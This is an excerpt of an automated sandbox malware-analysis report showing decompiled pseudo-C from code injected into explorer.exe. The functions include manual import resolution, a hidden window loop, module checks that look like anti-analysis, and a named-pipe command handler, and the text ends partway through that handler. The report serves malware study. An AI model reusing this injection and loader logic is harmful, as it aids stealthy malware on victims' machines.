                            • Opcode ID: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
                            • Instruction ID: 8115248732dee6e15747b0cfab76d271734f3ac179cb7c14a2a6e9e989f043a1
                            • Opcode Fuzzy Hash: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
                            • Instruction Fuzzy Hash: F82156B2A00214BFE714BBA4DC4AFEE77BCFB85310F108566B505E6182EE755F088B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 94%
                            			E0008CF84(void* __ecx) {
                            				intOrPtr _t11;
                            				long _t12;
                            				intOrPtr _t17;
                            				intOrPtr _t18;
                            				struct _OSVERSIONINFOA* _t29;
                            
                            				_push(__ecx);
                            				_t29 =  *0x9e688; // 0xb0000
                            				GetCurrentProcess();
                            				_t11 = E0008BA05(); // executed
                            				_t1 = _t29 + 0x1644; // 0xb1644
                            				_t25 = _t1;
                            				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
                            				_t12 = GetModuleFileNameW(0, _t1, 0x105);
                            				_t33 = _t12;
                            				if(_t12 != 0) {
                            					_t12 = E00088FBE(_t25, _t33);
                            				}
                            				_t3 = _t29 + 0x228; // 0xb0228
                            				 *(_t29 + 0x1854) = _t12;
                            				 *((intOrPtr*)(_t29 + 0x434)) = E00088FBE(_t3, _t33);
                            				memset(_t29, 0, 0x9c);
                            				_t29->dwOSVersionInfoSize = 0x9c;
                            				GetVersionExA(_t29);
                            				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
                            				_t17 = E0008E3B6(_t3);
                            				_t7 = _t29 + 0x220; // 0xb0220
                            				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
                            				_t18 = E0008E3F1(_t7); // executed
                            				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
                            				return _t18;
                            			}

                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
                            • GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
                            • memset.MSVCRT ref: 0008CFE2
                            • GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
                            • GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess$FileModuleNameVersionmemset
                            • String ID:
                            • API String ID: 3581039275-0
                            • Opcode ID: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
                            • Instruction ID: 1cd3ccc896d32ed381cc1e7efd68f96a46d511454c8c9de3dc1a9453bb6438f5
                            • Opcode Fuzzy Hash: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
                            • Instruction Fuzzy Hash: C4015E70901700ABE720BF70D84AADAB7E5FF85310F04082EF59683292EF746545CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 50%
                            			E0009249B(signed int __eax, intOrPtr _a4) {
                            				intOrPtr* _v8;
                            				signed int* _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _v24;
                            				signed int _v28;
                            				intOrPtr _v32;
                            				struct HINSTANCE__* _v36;
                            				intOrPtr _v40;
                            				signed int _v44;
                            				struct HINSTANCE__* _v48;
                            				intOrPtr _v52;
                            				signed int _v56;
                            				intOrPtr _v60;
                            				signed int _v64;
                            				signed int _t109;
                            				signed int _t112;
                            				signed int _t115;
                            				struct HINSTANCE__* _t121;
                            				void* _t163;
                            
                            				_v44 = _v44 & 0x00000000;
                            				if(_a4 != 0) {
                            					_v48 = GetModuleHandleA("kernel32.dll");
                            					_v40 = E0008E099(_v48, "GetProcAddress");
                            					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                            					_v32 = _v52;
                            					_t109 = 8;
                            					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                            						L24:
                            						return 0;
                            					}
                            					_v56 = 0x80000000;
                            					_t112 = 8;
                            					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                            					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                            						_v8 = _v8 + 0x14;
                            					}
                            					_t115 = 8;
                            					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                            					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                            						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
                            						_v36 = _t121;
                            						if(_v36 != 0) {
                            							if( *_v8 == 0) {
                            								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
                            							} else {
                            								_v12 =  *_v8 + _a4;
                            							}
                            							_v28 = _v28 & 0x00000000;
                            							while( *_v12 != 0) {
                            								_v24 = _v24 & 0x00000000;
                            								_v16 = _v16 & 0x00000000;
                            								_v64 = _v64 & 0x00000000;
                            								_v20 = _v20 & 0x00000000;
                            								if(( *_v12 & _v56) == 0) {
                            									_v60 =  *_v12 + _a4;
                            									_v20 = _v60 + 2;
                            									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
                            									_v16 = _v40(_v36, _v20);
                            								} else {
                            									_v24 =  *_v12;
                            									_v20 = _v24 & 0x0000ffff;
                            									_v16 = _v40(_v36, _v20);
                            								}
                            								if(_v24 != _v16) {
                            									_v44 = _v44 + 1;
                            									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                            										 *_v12 = _v16;
                            									} else {
                            										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
                            									}
                            								}
                            								_v12 =  &(_v12[1]);
                            								_v28 = _v28 + 4;
                            							}
                            							_v8 = _v8 + 0x14;
                            							continue;
                            						}
                            						_t163 = 0xfffffffd;
                            						return _t163;
                            					}
                            					goto L24;
                            				}
                            				return __eax | 0xffffffff;
                            			}

                            APIs
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000924B8
                            • LoadLibraryA.KERNEL32(00000000), ref: 00092551
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleLibraryLoadModule
                            • String ID: GetProcAddress$kernel32.dll
                            • API String ID: 4133054770-1584408056
                            • Opcode ID: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
                            • Instruction ID: 665fec345cac807b649f43962df39f6cef8ef0a689833b3db65f34db15b36259
                            • Opcode Fuzzy Hash: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
                            • Instruction Fuzzy Hash: F6617B75900209EFDF50CF98D885BADBBF1BF08315F258599E815AB3A1C774AA80EF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 165 82eda-82f50 memset call 8902d 170 82fcd-82fd4 165->170 171 82f52-82f81 CreateWindowExA 165->171 172 82fdf-82ff4 170->172 173 82fd6-82fd7 170->173 171->172 174 82f83-82f92 ShowWindow 171->174 173->172 175 82f9b 174->175 177 82fba-82fcb 175->177 177->170 179 82f9d-82fa0 177->179 179->170 180 82fa2-82fb2 179->180 180->177
                            C-Code - Quality: 96%
                            			E00082EDA(void* __eflags) {
                            				CHAR* _v12;
                            				struct HINSTANCE__* _v32;
                            				intOrPtr _v44;
                            				intOrPtr _v48;
                            				void _v52;
                            				char _v80;
                            				char _v144;
                            				intOrPtr _t25;
                            				intOrPtr _t32;
                            				struct HWND__* _t34;
                            				intOrPtr _t36;
                            				intOrPtr _t39;
                            				struct HWND__* _t44;
                            				intOrPtr _t47;
                            				intOrPtr _t50;
                            				void* _t51;
                            				intOrPtr _t53;
                            				intOrPtr _t56;
                            				intOrPtr _t59;
                            				struct HINSTANCE__* _t64;
                            
                            				_t25 =  *0x9e684; // 0x286f8f0
                            				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
                            				memset( &_v52, 0, 0x30);
                            				_t59 =  *0x9e688; // 0xb0000
                            				E0008902D(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
                            				_v48 = 3;
                            				_v52 = 0x30;
                            				_v12 =  &_v144;
                            				_v44 = E00082E77;
                            				_push( &_v52);
                            				_t32 =  *0x9e694; // 0x286fa48
                            				_v32 = _t64;
                            				if( *((intOrPtr*)(_t32 + 8))() == 0) {
                            					L6:
                            					_t34 =  *0x9e718; // 0x700e8
                            					if(_t34 != 0) {
                            						_t39 =  *0x9e694; // 0x286fa48
                            						 *((intOrPtr*)(_t39 + 0x28))(_t34);
                            					}
                            					L8:
                            					_t36 =  *0x9e694; // 0x286fa48
                            					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
                            					return 0;
                            				}
                            				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
                            				 *0x9e718 = _t44;
                            				if(_t44 == 0) {
                            					goto L8;
                            				}
                            				ShowWindow(_t44, 0);
                            				_t47 =  *0x9e694; // 0x286fa48
                            				 *((intOrPtr*)(_t47 + 0x18))( *0x9e718);
                            				while(1) {
                            					_t50 =  *0x9e694; // 0x286fa48
                            					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
                            					if(_t51 == 0) {
                            						goto L6;
                            					}
                            					if(_t51 == 0xffffffff) {
                            						goto L6;
                            					}
                            					_t53 =  *0x9e694; // 0x286fa48
                            					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
                            					_t56 =  *0x9e694; // 0x286fa48
                            					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
                            				}
                            				goto L6;
                            			}

                            APIs
                            • memset.MSVCRT ref: 00082EF9
                            • CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 00082F77
                            • ShowWindow.USER32(00000000,00000000), ref: 00082F8A
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$CreateShowmemset
                            • String ID: 0
                            • API String ID: 3027179219-4108050209
                            • Opcode ID: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
                            • Instruction ID: 213deb34b0e2dc67e2747e7ce6682629aec82146620f961571f6702d7269f10e
                            • Opcode Fuzzy Hash: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
                            • Instruction Fuzzy Hash: A93106B2500118AFF710EFA8DC89EAA7BBCFB18384F004066B649D72A2D634DD04CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 182 84d6d-84d8f 183 84dee-84e1b call 8b7a8 call 8a86d call 8a471 182->183 184 84d91-84db3 call 895c7 * 2 182->184 197 84e1d-84e20 183->197 198 84e25-84e80 call 8e1bc call 895e1 call 892e5 call 885d5 call 8b269 183->198 184->183 193 84db5-84db7 184->193 193->183 196 84db9-84dc4 GetModuleHandleA 193->196 199 84dcd 196->199 200 84dc6-84dcb GetModuleHandleA 196->200 201 852b9-852bf 197->201 217 84ea1-84ed9 call 8861a call 84a0b 198->217 218 84e82-84e93 call 8896f 198->218 203 84dd5-84dec call 885c2 * 2 199->203 200->199 200->203 203->183 203->197 228 84ef8-84f1b 217->228 229 84edb-84ee3 217->229 223 84e9c-84e9f 218->223 224 84e95-84e97 call 8a2e3 218->224 223->217 224->223 231 84f1d-84f2b 228->231 232 84f2f-84f54 call 8e2c6 228->232 229->228 230 84ee5-84ee9 229->230 233 84eef-84ef2 230->233 234 851f3-85220 call 895e1 call 892e5 230->234 231->232 242 84f71-84f78 232->242 243 84f56-84f6a call 8e2c6 232->243 233->228 233->234 244 85222-8522b call 8b269 234->244 245 85247-852b4 call 885d5 lstrcpynW * 2 call 88fbe call 8861a * 2 234->245 242->234 247 84f7e-84f87 242->247 243->242 257 85239-85246 call 8861a 244->257 258 8522d-85232 244->258 278 852b7 245->278 250 84f89-84f8e 247->250 251 84f96-84fa3 247->251 250->251 254 84f90 250->254 251->234 255 84fa9-84fad 251->255 254->251 259 85082-85088 255->259 260 84fb3-84fb6 255->260 257->245 258->257 259->234 263 8508e-850ff call 849a5 call 8fc1f 259->263 260->234 265 84fbc-8500f call 849a5 call 88604 260->265 263->234 283 85105-85119 call 88604 263->283 265->278 282 85015-8507d call 895e1 call 89640 call 885d5 call 8a911 call 8861a 265->282 278->201 282->278 283->234 289 8511f-85171 call 8109a call 8902d call 860df 283->289 303 85173-851d1 call 89640 call 885d5 call 8a911 289->303 304 851e5-851f2 call 8861a 289->304 312 851d6-851e2 call 8861a 303->312 304->234 312->304
                            C-Code - Quality: 70%
                            			E00084D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
                            				char _v516;
                            				char _v556;
                            				char _v564;
                            				char _v568;
                            				char _v572;
                            				char _v576;
                            				intOrPtr _v580;
                            				char _v588;
                            				signed int _v596;
                            				intOrPtr _v602;
                            				intOrPtr _v604;
                            				char _v608;
                            				CHAR* _v612;
                            				CHAR* _v616;
                            				signed int _v620;
                            				signed int _v624;
                            				signed int _v628;
                            				signed int _v632;
                            				char _v636;
                            				intOrPtr _t119;
                            				void* _t120;
                            				signed int _t122;
                            				intOrPtr _t123;
                            				CHAR* _t124;
                            				intOrPtr _t125;
                            				CHAR* _t127;
                            				WCHAR* _t130;
                            				intOrPtr _t133;
                            				intOrPtr _t137;
                            				WCHAR* _t138;
                            				intOrPtr _t142;
                            				WCHAR* _t143;
                            				CHAR* _t144;
                            				intOrPtr _t145;
                            				intOrPtr _t150;
                            				intOrPtr _t153;
                            				WCHAR* _t154;
                            				signed int _t159;
                            				WCHAR* _t160;
                            				intOrPtr _t163;
                            				intOrPtr _t165;
                            				intOrPtr _t166;
                            				intOrPtr _t170;
                            				signed int _t173;
                            				signed int _t178;
                            				intOrPtr _t182;
                            				WCHAR* _t184;
                            				char _t186;
                            				WCHAR* _t188;
                            				intOrPtr _t200;
                            				intOrPtr _t211;
                            				signed int _t215;
                            				char _t220;
                            				WCHAR* _t231;
                            				intOrPtr _t235;
                            				intOrPtr _t238;
                            				intOrPtr _t239;
                            				intOrPtr _t246;
                            				signed int _t248;
                            				WCHAR* _t249;
                            				CHAR* _t250;
                            				intOrPtr _t262;
                            				void* _t271;
                            				intOrPtr _t272;
                            				signed int _t277;
                            				void* _t278;
                            				intOrPtr _t280;
                            				signed int _t282;
                            				void* _t298;
                            				void* _t299;
                            				intOrPtr _t305;
                            				CHAR* _t326;
                            				void* _t328;
                            				WCHAR* _t329;
                            				intOrPtr _t331;
                            				WCHAR* _t333;
                            				signed int _t335;
                            				intOrPtr* _t337;
                            				void* _t338;
                            				void* _t339;
                            				void* _t353;
                            
                            				_t353 = __fp0;
                            				_t337 = (_t335 & 0xfffffff8) - 0x26c;
                            				_t119 =  *0x9e688; // 0xb0000
                            				_v620 = _v620 & 0x00000000;
                            				_t328 = __ecx;
                            				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
                            					L7:
                            					_t120 = E0008B7A8(0x9b9c8,  &_v516); // executed
                            					_t14 = _t120 + 1; // 0x1
                            					E0008A86D( &_v556, _t14, _t351);
                            					_t298 = 0x64;
                            					_t122 = E0008A471( &_v556, _t298);
                            					 *0x9e748 = _t122;
                            					if(_t122 != 0) {
                            						_push(0x4e5);
                            						_t299 = 0x10;
                            						_t123 = E0008E1BC(0x9b9cc, _t299); // executed
                            						 *0x9e680 = _t123;
                            						 *_t337 = 0x610;
                            						_t124 = E000895E1(0x9b9cc);
                            						_push(0);
                            						_push(_t124);
                            						_v612 = _t124;
                            						_t125 =  *0x9e688; // 0xb0000
                            						_t127 = E000892E5(_t125 + 0x228);
                            						_t338 = _t337 + 0xc;
                            						_v616 = _t127;
                            						E000885D5( &_v612);
                            						_t130 = E0008B269(_t127);
                            						_t246 = 3;
                            						__eflags = _t130;
                            						if(_t130 != 0) {
                            							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
                            							 *_t328 = _t246;
                            						}
                            						E0008861A( &_v616, 0xfffffffe);
                            						_t133 =  *0x9e688; // 0xb0000
                            						_t22 = _t133 + 0x114; // 0xb0114
                            						E00084A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
                            						_t262 =  *0x9e688; // 0xb0000
                            						_t339 = _t338 + 0x14;
                            						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
                            						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
                            							L17:
                            							asm("stosd");
                            							asm("stosd");
                            							asm("stosd");
                            							asm("stosd");
                            							asm("stosd");
                            							_v572 = _t328;
                            							_v576 =  *((intOrPtr*)(_t262 + 0x214));
                            							_t137 =  *0x9e680; // 0x286fdb0
                            							_t138 =  *(_t137 + 8);
                            							__eflags = _t138;
                            							if(_t138 != 0) {
                            								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
                            							}
                            							_v620 = _v620 & 0x00000000;
                            							E0008E2C6(_t353,  &_v576); // executed
                            							_pop(_t262);
                            							_t142 =  *0x9e6b4; // 0x286fa98
                            							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
                            							__eflags = _t143;
                            							if(_t143 == 0) {
                            								E0008E2C6(_t353,  &_v588);
                            								_t235 =  *0x9e6b4; // 0x286fa98
                            								_pop(_t262);
                            								 *((intOrPtr*)(_t235 + 0xc))(_v632);
                            							}
                            							__eflags =  *0x9e73c;
                            							if( *0x9e73c <= 0) {
                            								goto L36;
                            							} else {
                            								_t165 =  *0x9e680; // 0x286fdb0
                            								__eflags =  *(_t165 + 8);
                            								if( *(_t165 + 8) != 0) {
                            									_t231 =  *(_t165 + 0xc);
                            									__eflags = _t231;
                            									if(_t231 != 0) {
                            										 *_t231(_v580);
                            									}
                            								}
                            								_t166 =  *0x9e688; // 0xb0000
                            								_t262 =  *((intOrPtr*)(_t166 + 0x214));
                            								__eflags = _t262 - _t246;
                            								if(_t262 == _t246) {
                            									goto L36;
                            								} else {
                            									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
                            									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
                            										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
                            										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
                            											E000849A5();
                            											asm("stosd");
                            											asm("stosd");
                            											asm("stosd");
                            											asm("stosd");
                            											_t170 =  *0x9e684; // 0x286f8f0
                            											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
                            											_t262 = _v602;
                            											_t248 = 0x3c;
                            											_t173 = _t262 + 0x00000002 & 0x0000ffff;
                            											_v596 = _t173;
                            											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
                            											_t178 = _t262 + 0x0000000e & 0x0000ffff;
                            											_v624 = _t178;
                            											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
                            											_t182 =  *0x9e688; // 0xb0000
                            											_t184 = E0008FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0); // executed
                            											_t339 = _t339 + 0xc;
                            											__eflags = _t184;
                            											if(_t184 >= 0) {
                            												_t333 = E00088604(0x1000);
                            												_v616 = _t333;
                            												_pop(_t262);
                            												__eflags = _t333;
                            												if(_t333 != 0) {
                            													_t186 = E0008109A(_t262, 0x148);
                            													_t305 =  *0x9e688; // 0xb0000
                            													_v636 = _t186;
                            													_push(_t305 + 0x648);
                            													_push(0xa);
                            													_push(7);
                            													_t271 = 2;
                            													E0008902D(_t271,  &_v572);
                            													_t272 =  *0x9e688; // 0xb0000
                            													_t188 = E000860DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
                            													_t339 = _t339 + 0x18;
                            													_v632 = _t188;
                            													__eflags = _t188;
                            													if(_t188 != 0) {
                            														_push(_v624 % _t248 & 0x0000ffff);
                            														_push(_v628 & 0x0000ffff);
                            														_push(_v596 % _t248 & 0x0000ffff);
                            														_push(_v620 & 0x0000ffff);
                            														_push(_v632);
                            														_push( &_v572);
                            														_t200 =  *0x9e688; // 0xb0000
                            														__eflags = _t200 + 0x1020;
                            														E00089640(_t333, 0x1000, _v636, _t200 + 0x1020);
                            														E000885D5( &_v636);
                            														E0008A911(_t333, 0, 0xbb8, 1); // executed
                            														E0008861A( &_v632, 0xfffffffe);
                            														_t339 = _t339 + 0x44;
                            													}
                            													E0008861A( &_v616, 0xfffffffe);
                            													_pop(_t262);
                            												}
                            											}
                            										}
                            										goto L36;
                            									}
                            									__eflags = _t262 - 2;
                            									if(_t262 != 2) {
                            										goto L36;
                            									}
                            									E000849A5();
                            									asm("stosd");
                            									asm("stosd");
                            									asm("stosd");
                            									asm("stosd");
                            									_t211 =  *0x9e684; // 0x286f8f0
                            									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
                            									_t215 = _v602 + 0x00000002 & 0x0000ffff;
                            									_v628 = _t215;
                            									_t277 = 0x3c;
                            									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
                            									_t249 = E00088604(0x1000);
                            									_v624 = _t249;
                            									_pop(_t278);
                            									__eflags = _t249;
                            									if(_t249 != 0) {
                            										_t220 = E000895E1(_t278, 0x32d);
                            										_t280 =  *0x9e688; // 0xb0000
                            										_push(_t280 + 0x228);
                            										_t282 = 0x3c;
                            										_v636 = _t220;
                            										_push(_v628 % _t282 & 0x0000ffff);
                            										E00089640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
                            										E000885D5( &_v636);
                            										E0008A911(_t249, 0, 0xbb8, 1);
                            										E0008861A( &_v624, 0xfffffffe);
                            									}
                            									goto L41;
                            								}
                            							}
                            						} else {
                            							_t238 =  *((intOrPtr*)(_t262 + 0x214));
                            							__eflags = _t238 - _t246;
                            							if(_t238 == _t246) {
                            								goto L17;
                            							}
                            							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
                            							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
                            								L36:
                            								_t144 = E000895E1(_t262, 0x610);
                            								_push(0);
                            								_push(_t144);
                            								_v616 = _t144;
                            								_t145 =  *0x9e688; // 0xb0000
                            								_t329 = E000892E5(_t145 + 0x228);
                            								_v612 = _t329;
                            								__eflags = _t329;
                            								if(_t329 != 0) {
                            									_t160 = E0008B269(_t329);
                            									__eflags = _t160;
                            									if(_t160 != 0) {
                            										_t163 =  *0x9e684; // 0x286f8f0
                            										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
                            									}
                            									E0008861A( &_v612, 0xfffffffe);
                            								}
                            								E000885D5( &_v616);
                            								_t150 =  *0x9e688; // 0xb0000
                            								lstrcpynW(_t150 + 0x438,  *0x9e740, 0x105);
                            								_t153 =  *0x9e688; // 0xb0000
                            								_t154 = _t153 + 0x228;
                            								__eflags = _t154;
                            								lstrcpynW(_t154,  *0x9e738, 0x105);
                            								_t331 =  *0x9e688; // 0xb0000
                            								_t117 = _t331 + 0x228; // 0xb0228
                            								 *((intOrPtr*)(_t331 + 0x434)) = E00088FBE(_t117, __eflags);
                            								E0008861A(0x9e740, 0xfffffffe);
                            								E0008861A(0x9e738, 0xfffffffe);
                            								L41:
                            								_t159 = 0;
                            								__eflags = 0;
                            								L42:
                            								return _t159;
                            							}
                            							__eflags = _t238 - 2;
                            							if(_t238 != 2) {
                            								goto L36;
                            							}
                            							goto L17;
                            						}
                            					}
                            					L8:
                            					_t159 = _t122 | 0xffffffff;
                            					goto L42;
                            				}
                            				_t250 = E000895C7(0x6e2);
                            				_v616 = _t250;
                            				_t326 = E000895C7(0x9f5);
                            				_v612 = _t326;
                            				if(_t250 != 0 && _t326 != 0) {
                            					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
                            						_v620 = 1;
                            					}
                            					E000885C2( &_v616);
                            					_t122 = E000885C2( &_v612);
                            					_t351 = _v620;
                            					if(_v620 != 0) {
                            						goto L8;
                            					}
                            				}
                            			}

                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00084DC0
                            • GetModuleHandleA.KERNEL32(00000000), ref: 00084DC7
                            • lstrcpynW.KERNEL32(000AFBC8,00000105), ref: 0008526F
                            • lstrcpynW.KERNEL32(000AFDD8,00000105), ref: 00085283
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleModulelstrcpyn
                            • String ID:
                            • API String ID: 3430401031-0
                            • Opcode ID: ba1a0e27262ffeeef705cd697bedfda52239be39da119351be4a621040f75d7a
                            • Instruction ID: 161cbc9eeedcce8db67ccaa0b8f26abb365355608c06558398d668d8ddb63534
                            • Opcode Fuzzy Hash: ba1a0e27262ffeeef705cd697bedfda52239be39da119351be4a621040f75d7a
                            • Instruction Fuzzy Hash: 64E1AE71608341AFE750FF64DC86FAA73E9BB98314F04092AF584DB2D2EB74D9448B52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 315 832a1-832b4 316 832b7-832ce ConnectNamedPipe 315->316 317 832d0-832db GetLastError 316->317 318 832e1-83304 316->318 317->318 319 834c2-834c8 317->319 321 834a8 GetLastError 318->321 322 8330a-8330e 318->322 323 834ae-834bc DisconnectNamedPipe 321->323 322->321 324 83314-83320 322->324 323->316 323->319 325 833b8-833d1 call 893be 324->325 326 83326-83329 324->326 335 83476-8349b call 896ca 325->335 336 833d7-833dd 325->336 328 8332b-8332f 326->328 329 83397-833b3 call 8c319 326->329 332 8337b-83384 call 8f79f 328->332 333 83331-83334 328->333 329->323 352 83358-8335b 332->352 338 83365-83369 call 8f79f 333->338 339 83336-83339 333->339 355 8349d-834a6 call 8c319 335->355 341 833df-833f6 call 88604 336->341 342 83454-8346f call 89749 call 81da0 336->342 350 8336e-83376 338->350 345 8333b-8333e 339->345 346 8334f-83353 call 8f7c1 339->346 363 833f8-833fd 341->363 364 83471 341->364 342->335 345->323 353 83344-8334d call 8f7c1 345->353 346->352 350->355 356 8335d-83363 352->356 357 83386-83388 352->357 353->350 355->323 362 8338a-83392 call 8c319 356->362 357->362 362->323 367 8342a-83452 call 89749 call 81da0 call 894b7 363->367 368 833ff-83402 363->368 371 83473 364->371 367->371 373 83404-83425 call 8c379 call 891a6 368->373 371->335 383 83427 373->383 383->367
                            C-Code - Quality: 54%
                            			E000832A1() {
                            				char _v8;
                            				struct _OVERLAPPED* _v12;
                            				struct _OVERLAPPED* _v16;
                            				intOrPtr* _v20;
                            				char _v24;
                            				intOrPtr _v32;
                            				signed int _v36;
                            				intOrPtr* _v40;
                            				char _v168;
                            				char _v172;
                            				intOrPtr _t41;
                            				void* _t47;
                            				char _t54;
                            				char _t61;
                            				intOrPtr _t64;
                            				void* _t65;
                            				void* _t68;
                            				void* _t70;
                            				void* _t72;
                            				void* _t76;
                            				struct _OVERLAPPED* _t82;
                            				intOrPtr* _t83;
                            				signed int _t84;
                            				signed short* _t86;
                            				intOrPtr* _t97;
                            				signed short* _t105;
                            				void* _t107;
                            				void* _t108;
                            				void* _t109;
                            				intOrPtr* _t112;
                            				struct _OVERLAPPED* _t113;
                            				char _t114;
                            				void* _t115;
                            
                            				_t113 = 0;
                            				_t82 = 0;
                            				_v8 = 0;
                            				_v12 = 0;
                            				while(1) {
                            					_v16 = _t113;
                            					if(ConnectNamedPipe( *0x9e674, _t113) == 0 && GetLastError() != 0x217) {
                            						break;
                            					}
                            					_push(_t113);
                            					_push( &_v16);
                            					_t41 =  *0x9e684; // 0x286f8f0
                            					_push(0x80000);
                            					_push( *0x9e724);
                            					_push( *0x9e674);
                            					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
                            						GetLastError();
                            					} else {
                            						_t86 =  *0x9e724; // 0x2870020
                            						_t47 = ( *_t86 & 0x0000ffff) - 1;
                            						if(_t47 == 0) {
                            							_t112 = E000893BE( &(_t86[4]), 0x20, 1,  &_v24);
                            							_v40 = _t112;
                            							if(_t112 != 0) {
                            								_t114 = _v24;
                            								if(_t114 <= 1) {
                            									_t113 = 0;
                            									_t54 = E00081DA0(E00089749( *_t112), 0, 0, 0);
                            									_t115 = _t115 + 0x10;
                            									_v172 = _t54;
                            								} else {
                            									_v36 = _t114 - 1;
                            									_t83 = E00088604(_t114 - 1 << 2);
                            									_v32 = _t83;
                            									if(_t83 == 0) {
                            										_t113 = 0;
                            									} else {
                            										if(_t114 > 1) {
                            											_v20 = _t83;
                            											_t84 = 1;
                            											do {
                            												_t64 = E000891A6( *((intOrPtr*)(_t112 + _t84 * 4)), E0008C379( *((intOrPtr*)(_t112 + _t84 * 4))));
                            												_t97 = _v20;
                            												_t84 = _t84 + 1;
                            												 *_t97 = _t64;
                            												_v20 = _t97 + 4;
                            											} while (_t84 < _t114);
                            											_t83 = _v32;
                            										}
                            										_t113 = 0;
                            										_t61 = E00081DA0(E00089749( *_t112), _t83, _v36, 0);
